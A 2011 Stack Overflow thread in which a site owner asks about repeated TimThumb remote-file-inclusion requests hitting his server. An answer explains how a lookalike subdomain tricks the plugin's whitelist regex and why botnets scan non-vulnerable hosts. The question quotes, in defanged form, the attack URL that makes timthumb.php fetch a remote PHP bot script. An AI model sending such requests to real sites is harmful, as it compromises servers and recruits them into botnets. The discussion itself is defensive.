2

My server (mediaquarter.at) is currently being DDoSed by requests like this (with some minor variations): hXXp://www.mediaquarter.at/http://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php (URL "deactivated" so no one can accidentally click it)

Beware if you try to download the referenced PHP file: In the preg_replace there's the /e switch activated and the code contains multiple eval statements - clean that up before you want to take a look at it! Looks like pBot, you can find more information about it here: http://www.offensivecomputing.net/?q=node/1417

TimThumb is vulnerable to remote file inclusion (http://eromang.zataz.com/2011/09/20/wordpress-timthumb-rfi-vulnerability-used-as-botnet-recruitment-vector/) - seems to be pretty widespread in WordPress. So I would understand somebody calling hXXp://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php to exploit the vulnerability.

However, what's the point of trying to call it via another website (mediaquarter.at), which only results in a 404 error message? Additionally my server isn't running WordPress, but SilverStripe instead so this seems to be pretty pointless.

Is this just an error / stupid on the attacker's side or am I overlooking some kind of attack vector here?

PS: The server is just some cheap web hosting and I can't reach it at all, so I'm not able to verify if there are any changes on the system.

xeraa
  • 10,456
  • 3
  • 33
  • 66
  • Isn't serverfault a better place to ask this question? – Lukman Dec 14 '11 at 01:14
  • I'm primarily interested in why you'd call the RFI via another host, which isn't affected by the vulnerability. So I thought this would rather fit into the programming part than the sys admin one... – xeraa Dec 14 '11 at 01:27
  • Wow you have answered you own question in its entirety. Why did you post? – rook Dec 14 '11 at 02:27
  • My main question is the RFI via another host - to me this sounds pointless / doesn't seem to work. But I'm not sure if that's really true or if I'm overlooking something - so I'm asking the wise crowd of SO :-) – xeraa Dec 14 '11 at 02:30
  • http://s.tk/security is a good place for these kind of questions – Cheekysoft Dec 14 '11 at 12:55

1 Answers1

2

If you don't have the timthumb.php file then you're not vulnerable plain and simple. This is a very exotic vulnerability that I have studied in depth because (so far) its one of a kind. You should read the exploits written from the attacker's point of view.

In short, its caching images from "trusted" websites like youtube.com and blogger.com. However this regular expression is poorly written and isn't bound to the end of the string. its trivial to change your subdomain to fool this regex check. This is why the attacker's domain name is blogger.com.midislandrental.com.

The reason why you are getting DDoS'ed is probably because the fetch for timthumb.php isn't returning a 404 or the massive botnet that is spreading via timthumb.php is incorrectly fingerprinting you as being vulnerable. You could be showing up in a google dork for bots trying to find vulnerable hosts.

rook
  • 66,304
  • 38
  • 162
  • 239
  • I did get the part about the fake image in combination with the subdomain trick. However, I didn't think about the bot part - thanks for pointing that out! So I'd suspect some script kiddie wrote a crappy script to exploit the WordPress vulnerability. Instead of trying out loads of URLs, it concatenated my (non-vulnerable) URL with a potential target and tried that over and over - resulting in a DDoS... – xeraa Dec 14 '11 at 03:51
  • @xeraa Bot nets like this are the product of organized crime. There are people that camp sites like http://www.exploit-db.com/ and exploit systems in mass for profit. Also, sorry for such a dick post. – rook Dec 14 '11 at 07:20